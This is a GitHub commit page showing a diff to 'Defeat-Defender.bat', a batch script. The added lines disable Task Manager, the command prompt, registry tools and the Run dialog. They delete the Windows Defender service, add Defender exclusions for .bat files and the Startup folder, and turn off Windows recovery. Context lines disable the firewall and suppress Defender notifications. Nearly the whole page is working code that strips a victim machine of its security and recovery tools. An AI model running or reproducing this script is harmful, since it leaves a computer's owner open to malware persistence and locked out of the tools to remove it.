Skip to content

Commit

Permalink
Update Defeat-Defender.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
Rdimo authored Oct 13, 2021
1 parent 17c3597 commit 284cd54
Showing 1 changed file with 12 additions and 1 deletion.
13 changes: 12 additions & 1 deletion Defeat-Defender.bat
Original file line number Diff line number Diff line change
Expand Up @@ -40,10 +40,21 @@ NSudo -U:T -ShowWindowMode:Hide icacls "%pop%\System32\smartscreen.exe" /inherit

NSudo -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f

NSudo -U:T reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

NSudo -U:T reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f

NSudo -U:T reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f

NSudo -U:T reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide sc delete windefend

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

bcdedit /set {default} recoveryenabled No

bcdedit /set {default} bootstatuspolicy ignoreallfailures

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

Expand All @@ -65,4 +76,4 @@ powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
powershell.exe -command "netsh advfirewall set allprofiles state off"

cd "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

0 comments on commit 284cd54

Please sign in to comment.